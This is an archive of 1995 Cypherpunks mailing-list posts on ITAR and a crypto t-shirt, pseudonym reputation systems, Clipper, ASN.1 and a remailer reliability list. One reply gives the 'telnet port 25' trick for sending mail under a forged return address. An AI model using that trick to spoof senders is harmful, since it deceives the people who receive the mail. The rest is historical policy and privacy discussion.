  k1.ps ::	Key exchange algorithm K-1 -- with some very suggestive
		properties.  Whit Diffie titled this one
		"If S-1 is Skipjack, then K-1 is KEA" in the rump session
		list.  I'm not about to make that claim -- but it *does*
		have some interesting characteristics.

Enjoy,

	Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Sun, 3 Sep 95 22:12:51 PDT
To: cypherpunks@toad.com
Subject: Re: ASN.1 and Kerberos version 5
Message-ID: <v02130500ac6ff390c7a1@[199.1.11.217]>
MIME-Version: 1.0
Content-Type: text/plain


>I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it
>worked
>then ASN.1 would be very very usefull. But is just plain don't.
>
>ASN.1 is worse than useless, it means that a very good idea is rendered
>unusable
>because of a baddly botched implementation.
>

I'm not familiar with ASN.1 except for the occasional short piece in various
books.  But i was under the impression that it was similar to the language used
to define TCAP and ROSE standards.  These standards are reasonably well defined.
I've gotten to the point where i get annoyed when working with protocols that
treat everything like abitrarily organized bits and bytes (like NA Cellular
protocols and PGP).

So, would use of the language used to define TCAP and ROSE applications be
a possibility?  I've occasionally thought about developing such a protocol
for PGP.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 21:43:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509040130.VAA35298@tequesta.gate.net>
Message-ID: <9509040443.AA00884@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> With respect to possession within the U.S., there aren't any
> laws stopping you from waving strong cryptography around wherever you like
> (at least, not yet).

----
...and in private email, Jim Ray pointed out that showing the shirt to a
foreign national might technically violate ITAR...
----

Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then 
flashing it at a furriner could constitute a violation. Thanks for the 
correction.

The gist of my previous message remains: No local or state authority in the
U.S. (of which I'm aware) classifies strong cryptography as a munition, 
weapon, etc. I haven't heard of any restrictions on transporting crypto 
across state lines, either. Unless the Feds start cracking down on high 
schools, or the Perl-RSA shirt somehow violates some school dress code, (gang
colors ? ;)  the original questioner need not fret about his son wearing the
shirt to school. 

-Futplex, just another slimy tentacle of the List Maintainer



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 21:54:45 PDT
To: cypherpunks@toad.com
Subject: Oddly enough, Clipper is helpful
Message-ID: <199509040454.AAA05091@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Despite a few rants about how the NSA has monkeywrenched potential standards
for encryption with Clipper (market forces being what they are, even if there
were no Clipper we may still have no standard by now...), I think there is
oddly a good side to Clipper: the issue has thrown cryptography and security
into the public debate, even if marginally.

Prior to Clipper, PGP was not featured in national and international features
in TV, newspapers and magazines... now a lot of people want their hands on it.
People have become aware of communications security issues--very avaerage
folks who one might even consider techno-illiterates or luddites are now
concerned with the government's ability to listen in and watch them.

Think of Clipper as an opportunity to propose something better, as an
opportunity to make people more aware of the issue.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 22:06:16 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com>
Message-ID: <199509040505.BAA05115@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



*My* willingness to use such a system would depend on the system. Of course,
if you create such a system there will be somebody who uses it... how well
and in what circumstances, and how many people, use it, is another matter.

My worry is about abuse.  One would prefer to save endorsements and find
a way to remove thumbs-downs... also how to prevent one from overdoing a
thumbs-up or -down certification for a person (either to inflate or de-
flate a reputation).

In terms of persons, I see this more as an electronic equivalent of medals
awards, or those nifty little smiley stickers my second grade teacher used
to give.  After a while they become meaningless.

Systems to rate web-sites, newsgroups, etc. in terms of specific qualities
(sexual content, religious sentiment, useful information, technical/skill
level of material, size of posts/files, etc.) that showed the given
ratings of various organizations or people who were certified to rate on
that system would be good... if implemented properly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: suedeenim@censored.org (Sue Deenim)
Date: Sun, 3 Sep 95 23:06:28 PDT
To: cypherpunks@toad.com
Subject: Re: pseudonyms & list health
Message-ID: <199509040606.XAA29059@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this what your looking for?

Love Always,

Sue Deenim


>but what if these people had just stopped subscribing under
>their clear name? and started using a pseudonym?
>
>well, just some musings for those who unabashadly promote pseudonyms
>to contemplate.

>
>--Vlad Nuri
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Sun, 3 Sep 95 23:19:40 PDT
To: Lance Cottrell <loki@obscura.com>
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <ac6da5d1010210040573@[137.110.24.250]>
Message-ID: <Pine.BSD.3.91.950904013936.22741C-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Lance Cottrell wrote:

> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.

Se sure to test it first, sometimes it records who *really* sent it as 
well as the "forged" return address.

Test it by mailing to yourself and then look at all the headers.

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 23:14:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040505.BAA05115@csws5.ic.sunysb.edu>
Message-ID: <9509040614.AA01461@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant writes:
> My worry is about abuse.  One would prefer to save endorsements and find
> a way to remove thumbs-downs... also how to prevent one from overdoing a
> thumbs-up or -down certification for a person (either to inflate or de-
> flate a reputation).

A few nuisance lawsuits from people who were given thumbs-downs might do the
trick, as with employment recommendations in the U.S. :[

> In terms of persons, I see this more as an electronic equivalent of medals
> awards, or those nifty little smiley stickers my second grade teacher used
> to give.  After a while they become meaningless.

ObTim: As in other reputation markets, some people will spread their blessings
more liberally than others. They do this at the risk of diluting the worth of
each credential granted. It all comes out in the wash.

A reviewer named Susan Granger, for example, is known to me as a person who 
routinely lauds lousy movies. Thus it's simple for me to ignore her positive
recommendations (I've yet to see a negative review from her). In fact, when
I observe that a new film prominently features her seal of approval in its 
advertising, I take that fact as an indication of the lack of praise from
more discriminating reviewers. So a nominal "positive" credential may be
interpreted as an implicit negative credential, depending upon context.

OTOH, if I only give digital thumbs-up to a couple of people on the list,
those who consider me a reputable appraiser-of-cpunks should find the
information relatively useful. I'm sure I can manage to be a harsher critic
than your 2nd-grade teacher :}  Using e.g. a single 1-10 scale would be
highly practical for such purposes, IMHO.

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: p.v.mcmahon.rea0803@oasis.icl.co.uk
Date: Sun, 3 Sep 95 19:36:17 PDT
To: cypherpunks@toad.com
Subject: European wilingness to pay ...
Message-ID: <199509040220.24023.0@getafix>
MIME-Version: 1.0
Content-Type: text/plain








> also, Bob Morris said in his talk, acc. to Gillogly, that Europeans
> *were* willing to pay for encryption in their phones, but those in the
> US weren't. please expand on that little nugget!! how did you come

Presumably this is a reference to GSM.

- pvm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Mon, 4 Sep 95 00:00:47 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.950904022135.22741K-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Timothy C. May wrote:

> My hilltop house, in the Santa Cruz mountains, lies directly between
> Monterey and San Jose. His Excellency is landing tonight in
> Monterey--probably has just done so...


> (I find it hard to believe what the scribblers are saying, that this is the
> first visit by a sitting President to Monterey in 100 years. What with
> Carmel and Big Sur nearby, kind of hard to believe, eh?)


Oh shit!  There goes the neighborhood!

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 05:33:18 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Wearing RSA shirt to school
Message-ID: <199509041203.IAA38469@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snips throughout>

>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any
>>> laws stopping you from waving strong cryptography around wherever you like
>>> (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a
>>foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a
>violation of the ITAR. If you dispute this, ask whether Schneier's book is
>banned from export (the book, not the optional diskette). It isn't. Nor are
>other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be
enforced evenhandedly. The law is, after all, not written, or
interpreted, or enforced, by partisan Libertarians like me.
My private email to Futplex said *may* violate... and I stand
by it. [IANAL, though.] Whether or not a law as incontrovertably
stupid as ITAR is enforced may depend on the timing of the next
election, as we seem to be witnessing in the limbo-state of PRZ.

>I'm not minimizing the issue of export of machine-readable code, as in
>diskettes. But to claim that a blurry, printed on cotton "barcode" is even
>remotely in the same class as exporting a workable set of cryptographic
>system routines, or that letting a furriner merely "gaze upon" this blurry
>barcode, is a violation of the ITARs is laughable.

Yes, but *many* laws are laughable.

>>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>>flashing it at a furriner could constitute a violation. Thanks for the
>>correction.

Actually, it was less a correction than me pointing out (yet another)
note of uncertainty. James Madison, in Federalist #62 said it best:

"What indeed are all the repealing, explaining, and amending laws, which
fill and disgrace our voluminous codes, but so many monuments of deficient
wisdom." 

Now, many of us would be more than satisfied to get back to that level of
government. I suggest that everyone go have a look at the entire Code of
Federal Regulations, before the next election. <g>

>the original questioner need not fret about his son wearing the
>>shirt to school.

I agree that wearing it through Customs on the way to Jamaica would
be more problematic, but I live next to a US Customs agent, and he
learned about ITAR from me. Here in Miami, Customs has plenty to
think about with the various (occasionally venomous) inbound cargo.

>It was this series of posts about whether wearing the "munitions t-shirt"
>near schools was a crime or not that made me think the silly season had
>arrived.

It has, a long time ago. Ever watch C-SPAN?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm
nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ
MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx
UD/Hp9Poqbc=
=7tMD
-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 4 Sep 95 06:52:07 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509041351.GAA20450@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last ping: Mon 4 Sep 95 4:00:26 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           ***+****--**    12:42  99.99%
hacktic  remailer@utopia.hacktic.nl       ************    11:36  99.99%
hroller  hroller@c2.org                   --**********     9:55  99.99%
c2       remail@c2.org                    --++++++++++    45:17  99.99%
mix      mixmaster@remail.obscura.com     .---------+-  2:49:48  99.99%
flame    remailer@flame.alias.net         +++++-++++++    44:09  99.99%
spook    remailer@spook.alias.net         -+-------.-   2:58:30  99.99%
syrinx   syrinx@c2.org                    -----------   1:42:59  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***++*****-*    23:51  99.96%
rmadillo remailer@armadillo.com           ++++*+*++ +   1:04:53  99.93%
replay   remailer@replay.com              _***+*******    17:24  99.86%
ideath   remailer@ideath.goldenbear.com   ----- -----   5:13:51  99.60%
ncognito ncognito@gate.net                 #+**-** **      6:07  98.99%
portal   hfinney@shell.portal.com         ***+** ****      5:08  98.91%
ford     remailer@bi-node.zerberus.de      ***********     5:15  97.26%
extropia remail@extropia.wimsey.com       .-.._._ ---  16:38:13  95.81%
crown    mixmaster@kether.alias.net       --- ----- -   4:03:05  95.06%
vishnu   mixmaster@vishnu.alias.net       -----.  ---   6:20:56  90.88%
robo     robo@c2.org                       -**********    17:00  90.58%
rahul    homer@rahul.net                  ******++*+**     7:45  99.99%
penet    anon@anon.penet.fi               ---++++-- **  3:02:16  87.70%
gondolin mixmaster@gondolin.org                ---- .   5:35:11  77.43%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 08:14:49 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Key attributes (was: pseudonyms & list health)
Message-ID: <v02120d08ac70d3652d61@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



If anyone still has the flyer from the Crypto '95 rump session,
there was a guy there talking about ANSI standards, and one of
the things he mentioned in his talk was work they were doing on
"key attributes."

I spoke with him afterwards, and we had a lively discussion about
this matter; especially with regard to the relationship between
key certification and key attributes. I argued that certification is
just another kind of attribute, while he is fairly hung up on
certificate hierarchies, etc. (Of course, robust and well-implemented
attributes couild be used to implement a hierarchical certification
structure if that's what was desired, but there seems to be a
deep-seated feeling among crypto folks of a certain ilk that such
structure needs to be hard-coded into things.)

I'll be following up on this matter with him when I am reuinited
with my notes, which made an unintended trip to SF, while I only
went to Mountain View.

>
>I could see such a system initially being piggybacked on PGP keys (the
>signatures would not be understandable by PGP though), although for
>Chaumian credential transfers the keys have to be specially structured
>and that would require a new approach.
>
>Who would be willing and/or interested enough to use such a system if it
>existed?
>
>Hal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Sep 95 05:47:45 PDT
To: cypherpunks@toad.com
Subject: MAN_iax
Message-ID: <199509041247.IAA05904@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-4-95. NYPaper:

   "Computers Beware! New Type of Virus Is Loose on the Net."

      A new and deceptively simple type of computer virus, one
      that can sneak past security devices by hitching rides
      on electronic mail and other common Internet files, is
      causing deep concern among computer security officials
      around the world. Mr. Schmidt of Sun says, "There are 
      criminals in the world and some of them are programmers.
      With computer networks, they have an amplifying effect 
      that they've never had before. If I were a criminal with 
      a gun, I might attack one person. But with a computer
      network, I can attack a million people at a time. It's
      like an atomic bomb." To avert a potential disaster, 
      Mr. Schmidt has enlisted three of the world's top 
      computer security experts, including Tsutomo Shimomura, 
      Dan Farmer and Whitfield Diffie.

   "Cybervirus Whodunit: Who Creates This Stuff?"

      Ms. Gordon conducted detailed interviews, by electronic
      mail, Internet chat, telephone and in person, with more
      than 60 virus writers. "The virus writer has been 
      characterized by some as a bad, evil, depraved, maniac, 
      terrorist, technopathic, genius gone mad, sociopath." 
      This, she said, "is a gross oversimplification of the 
      situation."

   "Dick Tracy, Eat Your Heart Out."

      Move over, Captain Midnight. Heads up, Mata Hari. Now
      anyone can have a real-life decoder ring. The ring has
      a computer chip encoded with an identification number
      that gives the wearer access to secret computer files or
      locked rooms. The chip transmits your secret ID number 
      or data at the space-age speed of 16,000 bits a second.


   Triplets: MAN_iax








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Sep 95 06:08:36 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
Message-ID: <9509041307.AA20870@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Let's get real.

Yes, please.

The head of Sun's network security group is a foreign national.  They're
doing DES and public key work. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Sep 95 09:11:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: pseudonyms & list health
Message-ID: <ac7072bf0602100490af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:13 AM 9/4/95, Futplex wrote:
>Deranged Mutant writes:
>> My worry is about abuse.  One would prefer to save endorsements and find
>> a way to remove thumbs-downs... also how to prevent one from overdoing a
>> thumbs-up or -down certification for a person (either to inflate or de-
>> flate a reputation).
>
>A few nuisance lawsuits from people who were given thumbs-downs might do the
>trick, as with employment recommendations in the U.S. :[

A good point that deserves further comment. Employers have taken to _saying
nothing_ about past employees, for fear of lawsuits by disgruntled job
seekers. So much for free speech, courtesy of the American legal system.

But as we can't changed the litigious nature of American society (and maybe
European society--I don't know), the emphasis ought to be on digital
systems and reputations by pseudonyms.

Hal's comment about transferring credentials is one approach. Sort of an
automated version of "Pr0duct Cypher says the work of Sue D'Nim is good."

At this point, not enough pseudonymns to make it very worthwhile, but someday...


>ObTim: As in other reputation markets, some people will spread their blessings
>more liberally than others. They do this at the risk of diluting the worth of
>each credential granted. It all comes out in the wash.
>
>A reviewer named Susan Granger, for example, is known to me as a person who
>routinely lauds lousy movies. Thus it's simple for me to ignore her positive
>recommendations (I've yet to see a negative review from her). In fact, when
>I observe that a new film prominently features her seal of approval in its
>advertising, I take that fact as an indication of the lack of praise from
>more discriminating reviewers. So a nominal "positive" credential may be
>interpreted as an implicit negative credential, depending upon context.

Another good point. I always think: "Ah, they couldn't get either Siskel or
Ebert to endorse it." As Futplex notes, endorsements by second- or
third-tier endorsers are often a _negative_ endorsement.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 06:59:09 PDT
To: Alan Horowitz <alanh@infi.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SV4.3.91.950903215715.6268B-100000@larry.infi.net>
Message-ID: <199509041358.JAA03311@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure I see the words "cryptography" or any related to them
here. It might be an interesting topic, but it probably isn't
cypherpunks material.

.pm

Alan Horowitz writes:
> "Just cough up the peace dividend".
> 
> There is no ppeace dividend. There is a massive eco-spill of government 
> debt;  quite possibly larger than the GNP capacity of the American 
> economy to repay anytime in the next century.
> 
> The debt will be bankrupted, in some stealthy manner, hidden by masses of 
> smoke and mirrors. Nothing new here - it's  about the only thing that 
> works. For the mosrt recent examples, read up on FDR's confiscation of 
> gold in (?) 1933.  Or read the detrails of the currency changeover 
> effected by the occupation authorities in Germany (1947 or 1948).
> 
> Alan Horowitz
> alanh@infi.net
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 07:05:14 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <199509041405.KAA03334@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> ObConspiracy content: high.
> 
> They are coming to take me away, take me away!
> 
> Clinton's black helicopters are swooping low over my house.
> 
> What should I do?
> 
> Yes, this has nothing to do with coding in C, or even coding in Java, but
> it's too good a story not to share with you.

Actually, it didn't seem like much of a story at all. The president's
choppers flew over your place. Big deal. Can we get back to
cryptography, please? Or do you want to hear about the time I urinated
next to Paul Newman in the bathroom at the Tanglewood Music Festival?

.pm

PS Yes, have no sense of humor. So sorry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 07:13:36 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <9509041307.AA20870@sulphur.osf.org>
Message-ID: <199509041413.KAA03364@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



